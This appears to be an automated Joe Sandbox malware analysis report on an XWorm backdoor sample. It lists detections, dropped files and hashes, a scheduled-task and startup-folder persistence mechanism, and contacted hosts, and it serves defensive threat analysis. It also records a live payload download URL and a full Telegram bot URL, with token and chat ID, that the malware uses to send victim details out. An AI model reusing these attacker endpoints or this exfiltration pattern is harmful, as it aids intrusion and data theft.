Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	312 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
9NBx4Vmiuj.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Bsymem
9NBx4Vmiuj.exe	100%	Avira	HEUR/AGEN.1313071
9NBx4Vmiuj.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\btjxg.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	100%	Avira	HEUR/AGEN.1313071
C:\ProgramData\btjxg.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\btjxg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	100%	Joe Sandbox ML
C:\ProgramData\btjxg.exe	100%	Joe Sandbox ML
C:\ProgramData\btjxg.exe	79%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm
C:\Users\user\AppData\Local\Temp\btjxg.exe	79%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm
C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Bsymem

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/License	0%	URL Reputation	safe
http://crl.mic	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://crl.micros	0%	URL Reputation	safe
http://schemas.microsoft	0%	URL Reputation	safe
http://185.196.10.233/dggfsff.exe	100%	Avira URL Cloud	malware
https://api.telegrP	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gjhfhgdg.insane.wang	185.196.10.233	true	true		unknown
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=1267602057&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A9FCA14390BF6B97E9DB7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro	false		high
http://185.196.10.233/dggfsff.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.2367987837.000002AEC8A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2529744387.000001EC90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2158779274.000002184EA06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3409147293.000001E3C9A46000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2610110087.0000020937526000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://api.telegram.org/bot	RegSvcs.exe, 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, btjxg.exe.3.dr, btjxg.exe.4.dr	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.2314219862.000002AEB8C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.mic	powershell.exe, 0000000D.00000002.2821942479.000002801EE5C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=12676	btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/	btjxg.exe, 00000004.00000002.3366251779.0000000001312000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.2314219862.000002AEB8C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.2367987837.000002AEC8A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2529744387.000001EC90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegrP	btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000005.00000002.2314219862.000002AEB8A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.00000280069E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	btjxg.exe, 00000004.00000002.3374102569.000000000316E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341CCE2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3376937115.000001E3B9201000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3376937115.000001E3B94D8000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2314219862.000002AEB8A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.00000280069E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micros	powershell.exe, 0000000A.00000002.2555794283.000001ECF40A5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.microsoft	9NBx4Vmiuj.exe, 00000000.00000002.2133348072.00000234352C0000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2135768597.000002343558D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
157.254.223.19	unknown	United States	7768	TECHNICOLORUS	true
185.196.10.233	gjhfhgdg.insane.wang	Switzerland	42624	SIMPLECARRIERCH	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1416004
Start date and time:	2024-03-26 18:22:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9NBx4Vmiuj.exe renamed because original name is a hash value
Original Sample Name:	1d562eaa3e33451a40f60c976c6f4bc0.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@16/21@3/3
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 40.126.62.129, 20.190.190.132, 20.190.190.130, 40.126.62.132, 20.190.190.129, 20.190.190.131, 40.126.62.131, 40.126.62.130
Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target 9NBx4Vmiuj.exe, PID 7060 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 348 because it is empty
Execution Graph export aborted for target TypeId.exe, PID 7224 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2284 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7444 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7704 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: 9NBx4Vmiuj.exe

Simulations

Behavior and APIs

Time	Type	Description
18:23:07	Task Scheduler	Run new task: TypeId path: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
18:23:12	API Interceptor	58707x Sleep call for process: RegSvcs.exe modified
18:23:22	API Interceptor	53x Sleep call for process: powershell.exe modified
18:24:21	API Interceptor	308x Sleep call for process: btjxg.exe modified
18:24:22	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\btjxg.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	rCXi0tuUA3.js	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	Price Request.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.PWSX-gen.17424.6091.exe	Get hash	malicious	AgentTesla	Browse
	INVOICE BILL OF LADING PACKING LIST.exe	Get hash	malicious	AgentTesla	Browse
	SrBGGwLzpy.exe	Get hash	malicious	AgentTesla	Browse
	Shipment Receipt.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Pice request.exe	Get hash	malicious	AgentTesla	Browse
	rSWIFT.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.PWSX-gen.32061.26885.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win64.Evo-gen.17494.7440.exe	Get hash	malicious	Unknown	Browse
157.254.223.19	SecuriteInfo.com.Trojan.Siggen21.37421.15910.32261.exe	Get hash	malicious	SmokeLoader, XWorm	Browse
	file.exe	Get hash	malicious	SmokeLoader, XWorm	Browse
	file.exe	Get hash	malicious	SmokeLoader, XWorm	Browse
	file.exe	Get hash	malicious	SmokeLoader, XWorm	Browse
185.196.10.233	JOXwK3xz8r.exe	Get hash	malicious	Blank Grabber, PureLog Stealer, Xmrig, zgRAT	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gjhfhgdg.insane.wang	FIdKGKyjaO.exe	Get hash	malicious	Quasar	Browse	94.156.66.151
gjhfhgdg.insane.wang	SecuriteInfo.com.Win64.RATX-gen.14657.15844.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	91.92.254.93
api.telegram.org	rCXi0tuUA3.js	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
	Price Request.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.PWSX-gen.17424.6091.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	INVOICE BILL OF LADING PACKING LIST.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SrBGGwLzpy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Shipment Receipt.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	Pice request.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	rSWIFT.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.32061.26885.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Win64.Evo-gen.17494.7440.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	nUswWbPPmT.ocx.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	nUswWbPPmT.ocx.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	Incident_Report_Harassment_by_Employee.doc	Get hash	malicious	Unknown	Browse	149.154.167.99
	Incident_Report_Harassment_by_Employee.doc	Get hash	malicious	Unknown	Browse	149.154.167.99
	rCXi0tuUA3.js	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
	Price Request.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.PWSX-gen.17424.6091.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	INVOICE BILL OF LADING PACKING LIST.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SrBGGwLzpy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Shipment Receipt.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
SIMPLECARRIERCH	UNca1snvkz.elf	Get hash	malicious	Mirai	Browse	185.196.10.155
	bd7kzboTUq.elf	Get hash	malicious	Mirai	Browse	185.196.10.155
	H6ZdQFux3W.elf	Get hash	malicious	Mirai	Browse	185.196.10.155
	jxJoK9xswU.elf	Get hash	malicious	Mirai	Browse	185.196.10.155
	29oAGfUZCW.elf	Get hash	malicious	Mirai	Browse	185.196.10.155
	pwybQt2eUG.elf	Get hash	malicious	Mirai	Browse	185.196.10.155
	5sIvHoFITx.elf	Get hash	malicious	Mirai	Browse	185.196.10.155
	HQL3FRUU9P.elf	Get hash	malicious	Mirai	Browse	185.196.10.155
	nXxPDnZbof.elf	Get hash	malicious	Mirai	Browse	185.196.10.155
	SecuriteInfo.com.DeepScan.Generic.ShellCode.Donut.Marte.4.4BF2137B.9225.27785.exe	Get hash	malicious	PureLog Stealer, Xmrig	Browse	185.196.9.162
TECHNICOLORUS	c9agTsZ4l9.elf	Get hash	malicious	Mirai, Moobot	Browse	157.254.215.158
	arm7-20240205-0055.elf	Get hash	malicious	Mirai, Moobot	Browse	157.254.215.159
	SecuriteInfo.com.Trojan.Siggen21.37421.15910.32261.exe	Get hash	malicious	SmokeLoader, XWorm	Browse	157.254.223.19
	file.exe	Get hash	malicious	SmokeLoader, XWorm	Browse	157.254.223.19
	file.exe	Get hash	malicious	SmokeLoader, XWorm	Browse	157.254.223.19
	file.exe	Get hash	malicious	SmokeLoader, XWorm	Browse	157.254.223.19
	h5fNzaCc7N.elf	Get hash	malicious	Mirai, Moobot	Browse	157.254.215.188
	6BhVz1QxCs.elf	Get hash	malicious	Mirai, Moobot	Browse	157.254.215.160
	alKvTeMXWn.elf	Get hash	malicious	Mirai, Moobot	Browse	157.254.215.156
	RCNpn4iJl2.elf	Get hash	malicious	Mirai, Moobot	Browse	157.254.215.189

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	amqD5LrBlB.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	amqD5LrBlB.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win32.Evo-gen.24230.12907.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.22236.2799.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://fontmeme.com/disney-font/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://fontmeme.com/disney-font/	Get hash	malicious	Unknown	Browse	149.154.167.220
	INV.3175001503.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://1drv.ms/o/s!Aks-7t91vov6sE-66HewIX77qIuB?e=wdAigZ	Get hash	malicious	SharepointPhisher	Browse	149.154.167.220
	rCXi0tuUA3.js	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
	2023072401 DataMarch.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Local\Temp\btjxg.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	152064
Entropy (8bit):	5.677434375511732
Encrypted:	false
SSDEEP:	1536:RQuj357A7FK9fYP063O+xrBOybBYfOS4J+1oEhyiHn:quj5wFK9fYPJO+XtYmS4g+Ehfn
MD5:	2649EF15CF6004B05C80ABD825CD594E
SHA1:	2593CB7DB276D90D51EA5235EB4C14CBD8ECD5A5
SHA-256:	E6F7963C726231571294A06E1E8B1F03B87684CAD8383BB194B957FC685685C2
SHA-512:	3B1367D52CB5F99BCE35FEE1D6414DE92A9F10E8DF6DFD27C6872E5C4783EBA9BD0ED5A6D645FD93B81A064F46A00E25FA6D8404E2881F3006F8B04F2AD67DDC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\btjxg.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\btjxg.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\btjxg.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..f................................. ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc...............P..............@..B........................H........X..4[............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9NBx4Vmiuj.exe.log

Download File

Process:	C:\Users\user\Desktop\9NBx4Vmiuj.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	838
Entropy (8bit):	5.356471432431617
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
MD5:	E56A6A79CB531084A51F12C271BE7439
SHA1:	97A016CBE4C221936BAB8F76D33F7C021AA19ADF
SHA-256:	FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
SHA-512:	B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TypeId.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	838
Entropy (8bit):	5.356471432431617
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
MD5:	E56A6A79CB531084A51F12C271BE7439
SHA1:	97A016CBE4C221936BAB8F76D33F7C021AA19ADF
SHA-256:	FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
SHA-512:	B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\btjxg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	29
Entropy (8bit):	3.598349098128234
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsra:EFYJKDoWra
MD5:	2C11513C4FAB02AEDEE23EC05A2EB3CC
SHA1:	59177C177B2546FBD8EC7688BAD19D08D32640DE
SHA-256:	BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
SHA-512:	08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
Malicious:	false
Preview:	....### explorer ###..[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0fv5l1q.20e.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
